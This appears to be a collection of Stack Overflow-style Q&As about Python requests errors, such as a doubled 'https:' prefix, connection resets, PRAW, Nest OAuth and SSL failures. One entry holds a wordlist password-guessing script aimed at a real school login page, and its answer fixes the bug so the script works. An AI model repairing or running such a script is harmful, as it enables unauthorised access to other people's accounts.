Download with Python from URL gives No Host Supplied error

I am trying to make an app that downloads comics, but whenever I try to download an image, it says no host supplied.
I searched extensively and found nothing.
This is the code:
import requests,bs4
url='https://www.marvel.com/comics/issue/71314/edge_of_spider-geddon_2018_1'
res=requests.get(url,stream=True)
res.raise_for_status()
soup=bs4.BeautifulSoup(res.text)
elem=soup.select('div[class="row-item-image"] img')#.viewer-cnt .row .col-xs-12 #ppp img')
#print(elem)
comicurl='https:'+elem[0].get('src')
res=requests.get(comicurl,stream=True,allow_redirects=True)
res.raise_for_status()
with open(comicurl[comicurl.rfind('/')+1:],'wb') as i:
    for chunk in res.iter_content(100000):
        i.write(chunk)
I expect it to download the image but it gives me this error:
Traceback (most recent call last):
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\comicdownloader.py", line 10, in <module>
res=requests.get(comicurl,stream=True,allow_redirects=True)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\sessions.py", line 519, in request
prep = self.prepare_request(req)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\sessions.py", line 462, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\models.py", line 313, in prepare
self.prepare_url(url, params)
File "C:\Users\Islam\AppData\Local\Programs\Python\Python36\lib\site-packages\requests\models.py", line 390, in prepare_url
raise InvalidURL("Invalid URL %r: No host supplied" % url)
requests.exceptions.InvalidURL: Invalid URL 'https:https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg': No host supplied
And it gives it to me whenever I try it on any website.

It looks like elem[0].get('src') already evaluates to the full URL https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg.
So on the line comicurl='https:'+elem[0].get('src') you add https: in front of an already well-formed URL, making it invalid.

Can't argue with this: Invalid URL 'https:https://i.annihil.us/u/prod -- the URL really is invalid. You should probably drop the 'https:' prefix in the following statement:
comicurl='https:'+elem[0].get('src')
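If the src attribute is sometimes a full URL and sometimes protocol-relative (starting with //) or site-relative, one option is to resolve it against the page URL instead of prepending a scheme by hand. This is a minimal sketch using the standard library's urljoin; the helper name absolute_image_url and the two example.jpg paths are made up for illustration.

```python
from urllib.parse import urljoin

def absolute_image_url(page_url, src):
    """Resolve an <img> src against the URL of the page it was found on."""
    return urljoin(page_url, src)

page = "https://www.marvel.com/comics/issue/71314/edge_of_spider-geddon_2018_1"

# Already absolute: returned unchanged.
full = absolute_image_url(
    page,
    "https://i.annihil.us/u/prod/marvel/i/mg/6/b0/5b6c5e4154f75/portrait_uncanny.jpg",
)
# Protocol-relative (hypothetical path): inherits the page's scheme.
proto_relative = absolute_image_url(page, "//i.annihil.us/u/example.jpg")
# Site-relative (hypothetical path): inherits the page's scheme and host.
site_relative = absolute_image_url(page, "/images/example.jpg")

print(full)
print(proto_relative)
print(site_relative)
```

In the question's script this would replace the string concatenation, e.g. comicurl = urljoin(url, elem[0].get('src')).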

Related

Failed to parse: <Response [200]>

Please help me, I don't know how to use requests.
This is the code:
import requests
url = requests.get("https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html")
arq = open('word.txt','r').readlines()
for line in arq:
password = line.strip()
http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
content = http.content
if "Identifiant ou mot de passe incorrect" in content:
print("[-]Invalide : "+password)
else:
print("================== [+] MOT DE PASSE CRACKÉ : "+password+"===========")
break
and I got this:
Traceback (most recent call last):
File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 382, in prepare_url
scheme, auth, host, port, path, query, fragment = parse_url(url)
File "F:\Program Files (x86)\py\lib\site-packages\urllib3\util\url.py", line 394, in parse_url
return six.raise_from(LocationParseError(source_url), None)
File "", line 3, in raise_from
urllib3.exceptions.LocationParseError: Failed to parse: <Response [200]>
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "F:/Program Files (x86)/py/Hack pronote/Pronote v3/Pronote.py", line 8, in
http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
File "F:\Program Files (x86)\py\lib\site-packages\requests\api.py", line 119, in post
return request('post', url, data=data, json=json, **kwargs)
File "F:\Program Files (x86)\py\lib\site-packages\requests\api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "F:\Program Files (x86)\py\lib\site-packages\requests\sessions.py", line 528, in request
prep = self.prepare_request(req)
File "F:\Program Files (x86)\py\lib\site-packages\requests\sessions.py", line 456, in prepare_request
p.prepare(
File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 316, in prepare
self.prepare_url(url, params)
File "F:\Program Files (x86)\py\lib\site-packages\requests\models.py", line 384, in prepare_url
raise InvalidURL(*e.args)
requests.exceptions.InvalidURL: Failed to parse: <Response [200]>

As #Iarsks said, the problem is that you pass the url variable where a URL is expected, but url is not a string: it is the Response object returned by requests.get(), which is why the error message shows <Response [200]>.
You don't need to call requests.get() to declare a URL. You only need the URL string, like this:
url = "https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html"
without the requests.get() call.
To understand the library better: the two most commonly used request methods are GET and POST (there are more, but I'll only cover these two here). Use GET when you want to retrieve information from a website, for example a JSON file from an API, and POST when you want to save or send new data to an API or web page.
In any case, I recommend reading about the basics of HTTP requests and how the backend handles them before using requests on your own.
If I understood your problem correctly, the following code should fix it:
import requests
url = "https://idp-fim-aaa.ac-bordeaux.fr/login/ct_logon_mixte.jsp?CT_ORIG_URL=%2Fsso%2FSSO%3FSPEntityID%3Dhttps%3A%2F%2Fent2d.ac-bordeaux.fr%2Fshibboleth%26TARGET%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html%26RelayState%3Dhttps%3A%252F%252F0333287U.index-education.net%252Fpronote%252Feleve.html"
arq = open('word.txt','r').readlines()
for line in arq:
password = line.strip()
http = requests.post(url, data={'user':'bisch', 'password':password, 'button':'submit'})
content = http.content
if "Identifiant ou mot de passe incorrect" in content:
print("[-]Invalide : "+password)
else:
print("================== [+] MOT DE PASSE CRACKÉ : "+password+"===========")
break

Python Requests OS Error 104 Connection Broken Error

Hi, I am trying to hit an API using Python's requests module. The API has to be hit about 20,000 times, since there are around 20,000 pages. Each response is around 10 MB, and by the end of the process it creates a JSON file of around 100 GB. Here is the code I have written:
with open('file.json','wb',buffering=100*1048567) as f:
    while(next_page_cursor != ""):
        with requests.get(url,headers=headers) as response:
            json_response = json.loads(response.content.decode('utf-8'))
            """
            json response looks something like this
            {
            content:[{},{},{}........50 dictionaries]
            next_page_cursor : "abcd"
            }
            """
            next_page_cursor = json_response['next_page_cursor']
            for data in json_response['content']:
                f.write((json.dumps(data) + "\n").encode())
But after running successfully for a few pages, the code fails with the error below:
Traceback (most recent call last):
File "<command-1206920060120926>", line 65, in <module>
with requests.get(data_url, headers = headers) as response:
File "/databricks/python/lib/python3.7/site-packages/requests/api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/sessions.py", line 533, in request
resp = self.send(prep, **send_kwargs)
File "/databricks/python/lib/python3.7/site-packages/requests/sessions.py", line 686, in send
r.content
File "/databricks/python/lib/python3.7/site-packages/requests/models.py", line 828, in content
self._content = b''.join(self.iter_content(CONTENT_CHUNK_SIZE)) or b''
File "/databricks/python/lib/python3.7/site-packages/requests/models.py", line 753, in generate
raise ChunkedEncodingError(e)
requests.exceptions.ChunkedEncodingError: ('Connection broken: OSError("(104, \'ECONNRESET\')")', OSError("(104, 'ECONNRESET')"))

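You need to read the body with response.iter_content (passing stream=True to requests.get) instead of response.content, so that it is consumed in chunks rather than loaded into memory all at once.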
https://2.python-requests.org/en/master/api/#requests.Response.iter_content
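Reading in chunks keeps memory bounded, but over roughly 20,000 requests a connection can still be reset by the server. Retrying the failed page is a separate mitigation that the answer above does not mention. This is only a sketch: call_with_retries, its parameters, and the flaky stand-in function are hypothetical. It catches OSError because the requests exceptions, including ChunkedEncodingError, derive from it.

```python
import time

def call_with_retries(func, retries=3, base_delay=1.0,
                      exceptions=(OSError,), sleep=time.sleep):
    """Call func(); on a listed exception, wait and retry with exponential backoff."""
    for attempt in range(retries + 1):
        try:
            return func()
        except exceptions:
            if attempt == retries:
                raise  # out of retries: let the caller see the error
            sleep(base_delay * (2 ** attempt))

# Stand-in for one page fetch that fails twice with a reset, then succeeds.
calls = {"n": 0}

def flaky_fetch():
    calls["n"] += 1
    if calls["n"] < 3:
        raise ConnectionResetError(104, "ECONNRESET")
    return {"content": [], "next_page_cursor": ""}

delays = []  # record the waits instead of actually sleeping
page = call_with_retries(flaky_fetch, retries=3, base_delay=0.5, sleep=delays.append)
print(page, delays)
```

In the real loop, func would be a small function that performs the requests.get call for the current page and returns the parsed JSON.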

PRAW raising RequestException when I try to run simple bot

I'm trying to write a redditbot; I decided to start with a simple one, to make sure I was doing things properly, and I got a RequestException.
my code (bot.py):
import praw
for s in praw.Reddit('bot1').subreddit("learnpython").hot(limit=5):
    print s.title
my praw.ini file:
# The URL prefix for OAuth-related requests.
oauth_url=https://oauth.reddit.com
# The URL prefix for regular requests.
reddit_url=https://www.reddit.com
# The URL prefix for short URLs.
short_url=https://redd.it
[bot1]
client_id=HIDDEN
client_secret=HIDDEN
password=HIDDEN
username=HIDDEN
user_agent=ILovePythonBot0.1
(where HIDDEN replaces the actual id, secret, password and username.)
my Traceback:
Traceback (most recent call last):
File "bot.py", line 3, in <module>
for s in praw.Reddit('bot1').subreddit("learnpython").hot(limit=5):
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 79, in next
return self.__next__()
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 52, in __next__
self._next_batch()
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 62, in _next_batch
self._listing = self._reddit.get(self.url, params=self.params)
File "/usr/local/lib/python2.7/dist-packages/praw/reddit.py", line 322, in get
data = self.request('GET', path, params=params)
File "/usr/local/lib/python2.7/dist-packages/praw/reddit.py", line 406, in request
params=params)
File "/usr/local/lib/python2.7/dist-packages/prawcore/sessions.py", line 131, in request
params=params, url=url)
File "/usr/local/lib/python2.7/dist-packages/prawcore/sessions.py", line 70, in _request_with_retries
params=params)
File "/usr/local/lib/python2.7/dist-packages/prawcore/rate_limit.py", line 28, in call
response = request_function(*args, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/prawcore/requestor.py", line 48, in request
raise RequestException(exc, args, kwargs)
prawcore.exceptions.RequestException: error with request request() got an unexpected keyword argument 'json'
Any help would be appreciated. PS: I am using Python 2.7 on Ubuntu 14.04. Please ask me for any other information you may need.

The way I see it, you have a problem with your request to the Reddit API. Try changing the user agent in your praw.ini configuration. According to PRAW's basic configuration options, the user agent should follow the format <platform>:<app ID>:<version string> (by /u/<reddit username>). Try that and see what happens.
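As a small illustration of that format, the sketch below assembles a user agent string from its four parts. The helper name build_user_agent and all four example values are placeholders, not values from the question.

```python
def build_user_agent(platform, app_id, version, username):
    """Format: <platform>:<app ID>:<version string> (by /u/<reddit username>)."""
    return "{}:{}:{} (by /u/{})".format(platform, app_id, version, username)

# All four values below are placeholders for illustration.
user_agent = build_user_agent("linux", "com.example.ilovepythonbot", "v0.1", "example_user")
print(user_agent)
```

The resulting string would go in the user_agent entry of the [bot1] section in praw.ini.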

Having issues getting firebase data through Oauth pin-auth session for Nest

Base script:
from sanction import Client
# client_id & client_secret are omitted but are valid
client_pin = input('Enter PIN:')
access_token_url = 'https://api.home.nest.com/oauth2/access_token'
c = Client(
    token_endpoint=access_token_url,
    client_id=client_id,
    client_secret=client_secret)
c.request_token(code = client_pin)
[See edits for history]
Running c.request('/devices') returned:
Traceback (most recent call last):
File "C:\py\nest_testing_sanction.py", line 36, in <module>
c.request("/devices")
File "C:\Python34\lib\site-packages\sanction-0.4.1-py3.4.egg\sanction\__init__.py", line 169, in request
File "C:\Python34\lib\site-packages\sanction-0.4.1-py3.4.egg\sanction\__init__.py", line 211, in transport_query
File "C:\Python34\lib\urllib\request.py", line 258, in __init__
self.full_url = url
File "C:\Python34\lib\urllib\request.py", line 284, in full_url
self._parse()
File "C:\Python34\lib\urllib\request.py", line 313, in _parse
raise ValueError("unknown url type: %r" % self.full_url)
ValueError: unknown url type: 'None/devices?access_token=c.[some long session token]'
Given the output it seems like I need to be putting in a generic URL so I tried c.request('wss://developer-api.nest.com'):
Traceback (most recent call last):
File "C:\py\nest_testing_sanction.py", line 36, in <module>
data = c.request(query_url)
File "C:\Python34\lib\site-packages\sanction-0.4.1-py3.4.egg\sanction\__init__.py", line 171, in request
File "C:\Python34\lib\urllib\request.py", line 153, in urlopen
return opener.open(url, data, timeout)
File "C:\Python34\lib\urllib\request.py", line 455, in open
response = self._open(req, data)
File "C:\Python34\lib\urllib\request.py", line 478, in _open
'unknown_open', req)
File "C:\Python34\lib\urllib\request.py", line 433, in _call_chain
result = func(*args)
File "C:\Python34\lib\urllib\request.py", line 1257, in unknown_open
raise URLError('unknown url type: %s' % type)
urllib.error.URLError: <urlopen error unknown url type: nonewss>
I also tried https as per:
- same result
By contrast, this works (for a firebase.io virtual device):
firebase = firebase.FirebaseApplication('https://nesttest.firebaseio.com', None)
thermostat_result = firebase.get('/devices', 'thermostats')

In Python I would use something like sanction to keep things simple. You should be able to get it to work with the Nest API using code like: (untested, using token flow rather than pin flow)
from sanction.client import Client
# instantiating a client to get the auth URI
c = Client(auth_endpoint="https://home.nest.com/login/oauth2",
           client_id=config["nest.client_id"])
# instantiating a client to process OAuth2 response
c = Client(token_endpoint="https://api.home.nest.com/oauth2/access_token",
           client_id=config["nest.client_id"],
           client_secret=config["nest.client_secret"])
The library is well documented, so you should be able to figure it out from here if something is missing.

This is more of a comment, but the system does not let me comment just yet.
To your question about where to put the web PIN: simply add code = pin to the request_token call.
c.request_token(code = nest_client_pin)
This still does not fully solve the issue as I can only use a PIN once. After I have used it once, every subsequent call will fail again as you describe. Still researching that.
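A note on the two tracebacks in the question: 'None/devices' and 'nonewss' both look like a base URL that was never set (None) being concatenated with the argument passed to request. The sketch below reproduces that effect with plain string formatting. It assumes the client joins a base endpoint and a path this way, which is inferred from the error messages rather than confirmed from sanction's source. The https://developer-api.nest.com base is likewise an assumption, derived from the wss:// URL in the question.

```python
from urllib.parse import urlsplit

def join_endpoint(resource_endpoint, path):
    """Concatenate a base endpoint and a path, as the traceback URLs suggest."""
    return "{0}{1}".format(resource_endpoint, path)

# With no base endpoint set, None is formatted into the URL as text.
unset = join_endpoint(None, "/devices")
print(unset)                         # None/devices
print(repr(urlsplit(unset).scheme))  # '' (no scheme, hence "unknown url type")

# Passing a full URL does not help: "None" becomes part of the scheme.
unset_wss = join_endpoint(None, "wss://developer-api.nest.com")
print(urlsplit(unset_wss).scheme)    # nonewss

# With a base endpoint (assumed value), the URL has a usable scheme.
fixed = join_endpoint("https://developer-api.nest.com", "/devices")
print(urlsplit(fixed).scheme)        # https
```

If the client accepts a base resource URL at construction time, setting it there and keeping c.request('/devices') as a relative path may be what is missing. Check the library's documentation for the exact parameter name.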

SSL Error occurs on one computer but not the other?

I can't figure out why all of a sudden the below code that uses Asana's API generates the below SSL error. Something must have changed on my laptop, since it runs perfectly on my other computer.
from asana import asana
class Login(object):
    def __init__(self):
        api = 'API'
        self.asana_api = asana.AsanaAPI(api, debug=False)
        self.user_id = 7359085011308L
class Test(Login):
    def Test(self):
        Id = 2467584555313L
        print self.asana_api.list_tasks(Id,self.user_id)
Traceback (most recent call last):
File "/Users/Chris/Dropbox/AsanaPullPush.py", line 75, in <module>
if __name__ == "__main__": main()
File "/Users/Chris/Dropbox/AsanaPullPush.py", line 72, in main
print Test().Test()
File "/Users/Chris/Dropbox/AsanaPullPush.py", line 15, in Test
print self.asana_api.list_tasks(Id,self.user_id)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/asana/asana.py", line 174, in list_tasks
return self._asana(target)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/asana/asana.py", line 74, in _asana
r = requests.get(target, auth=(self.apikey, ""))
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/requests/api.py", line 55, in get
return request('get', url, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/requests/api.py", line 44, in request
return session.request(method=method, url=url, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/requests/sessions.py", line 383, in request
resp = self.send(prep, **send_kwargs)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/requests/sessions.py", line 486, in send
r = adapter.send(request, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/requests/adapters.py", line 389, in send
raise SSLError(e)
requests.exceptions.SSLError: [Errno 1] _ssl.c:507: error:0D0890A1:asn1 encoding routines:ASN1_verify:unknown message digest algorithm

We recently changed our SSL key in response to the Heartbleed bug you may have heard about. http://blog.asana.com/2014/04/heartbleed/
It looks like your laptop may not have the right SSL. See https://github.com/pypa/pip/issues/829 for discussion of a similar issue.
You should be able to check SSL version on the two machines with python -c "import ssl; print ssl.OPENSSL_VERSION". If indeed the laptop is behind, you'll need to update your python's SSL.
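The one-liner above uses the Python 2 print statement. A version of the same check that also runs on Python 3 might look like the sketch below. The helper name openssl_summary is made up, while ssl.OPENSSL_VERSION and ssl.OPENSSL_VERSION_INFO are standard library attributes.

```python
import ssl

def openssl_summary():
    """Return the version string and numeric tuple of the OpenSSL library Python loaded."""
    return ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO

version, info = openssl_summary()
print(version)  # human-readable version string
print(info)     # tuple of five integers, convenient for comparisons
```

Running it on both machines and comparing the output shows whether the laptop's Python is using an older OpenSSL.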
